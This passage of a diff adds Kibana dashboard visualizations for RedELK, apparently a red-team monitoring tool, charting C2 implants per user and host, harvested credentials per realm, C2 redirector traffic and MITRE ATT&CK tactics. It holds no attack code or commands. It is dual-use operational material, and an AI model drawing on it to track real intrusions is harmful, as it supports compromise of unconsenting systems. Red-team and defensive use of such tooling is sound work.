Organisation\"},\"schema\":\"bucket\"},{\"id\":\"4\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"source.geo.country_iso_code\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":1,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":true,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Country\"},\"schema\":\"bucket\"}],\"params\":{\"perPage\":10,\"showPartialRows\":true,\"showMetricsAtAllLevels\":false,\"sort\":{\"columnIndex\":null,\"direction\":null},\"showTotal\":true,\"totalFunc\":\"sum\",\"percentageCol\":\"Hits\",\"showToolbar\":true}}"}, "coreMigrationVersion": "7.16.3", "id": "cbb7d710-efee-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1234], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Tasks execution timeframe", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"min\",\"schema\":\"metric\",\"params\":{\"field\":\"@timestamp\",\"customLabel\":\"First task\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"max\",\"schema\":\"metric\",\"params\":{\"field\":\"@timestamp\",\"customLabel\":\"Last task\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":24}}},\"title\":\"RedELK - Tasks execution timeframe\"}"}, "coreMigrationVersion": "7.16.3", "id": "ce581930-d361-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1236], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Target host and user selector", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"input_control_vis\",\"aggs\":[],\"params\":{\"controls\":[{\"id\":\"1595867425052\",\"fieldName\":\"host.name\",\"parent\":\"\",\"label\":\"Target host(s)\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_0_index_pattern\"},{\"id\":\"1595867451919\",\"fieldName\":\"user.name\",\"parent\":\"\",\"label\":\"Target user(s)\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_1_index_pattern\"}],\"updateFiltersOnChange\":true,\"useTimeFilter\":false,\"pinFilters\":false},\"title\":\"RedELK - Target host and user selector\"}"}, "coreMigrationVersion": "7.16.3", "id": "d2c7b720-d026-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "control_0_index_pattern", "type": "index-pattern"}, {"id": "rtops", "name": "control_1_index_pattern", "type": "index-pattern"}], "sort": [1645363346672, 1239], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - HTTP Redir traffic per backend", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir traffic per backend\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"filters\",\"params\":{\"filters\":[{\"input\":{\"query\":\"redir.backend.name : c2*\",\"language\":\"kuery\"},\"label\":\"C2 traffic\"},{\"input\":{\"query\":\"not redir.backend.name : c2*\",\"language\":\"kuery\"},\"label\":\"Non-C2 traffic\"}]},\"schema\":\"segment\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"redir.backend.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Backend\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.3", "id": "d625ba60-efe8-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1241], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Credentials\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Credentials total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "dcf86190-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1243], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"c2.log.type: implant_newimplant\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "title": "RedELK - New implants over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"New implants over time\",\"type\":\"line\",\"params\":{\"type\":\"line\",\"grid\":{\"categoryLines\":true,\"style\":{\"color\":\"#eee\"},\"valueAxis\":null},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"truncate\":100,\"rotate\":0,\"filter\":true},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Amount of implants\"}}],\"seriesParams\":[{\"show\":\"true\",\"type\":\"line\",\"mode\":\"stacked\",\"data\":{\"label\":\"Amount of implants\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"showCircles\":true,\"interpolate\":\"linear\",\"lineWidth\":5,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"times\":[],\"addTimeMarker\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true,\"fittingFunction\":\"linear\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"interval\":\"auto\",\"min_doc_count\":1,\"extended_bounds\":{}}}]}"}, "coreMigrationVersion": "7.16.3", "id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1645363346672, 1245], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic All", "uiStateJSON": "{\"mapCenter\":[20.96143961409684,13.007096309476236],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Blues\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic All\"}"}, "coreMigrationVersion": "7.16.3", "id": "e97f6f10-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1645363346672, 1247], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Implant per top users with computers", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"horizontal_bar\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Username\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":50,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Computername\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false,\"style\":{\"color\":\"#eee\"}},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":200},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-2\",\"name\":\"BottomAxis-1\",\"type\":\"value\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":75,\"filter\":true,\"truncate\":100},\"title\":{\"text\":\"Amount of implants\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Amount of implants\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-2\",\"drawLinesBetweenPoints\":true,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Implant per top users with computers\"}"}, "coreMigrationVersion": "7.16.3", "id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1645363346672, 1250], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Redirector traffic alarmed IP over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Total hits\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"source.ip\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":true,\"otherBucketLabel\":\"Other IPs\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Alarmed IPs\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Total hits\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Total hits\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Redirector traffic alarmed IP over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "f7141500-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1252], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Tactics tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"signal.rule.threat.tactic.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":300,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":64,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - MITRE ATT&CK Tactics tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1254], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials per realm tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"creds.realm.keyword\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Credentials per realm tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1256], "type": "visualization", "version": "1"} \ No newline at end of file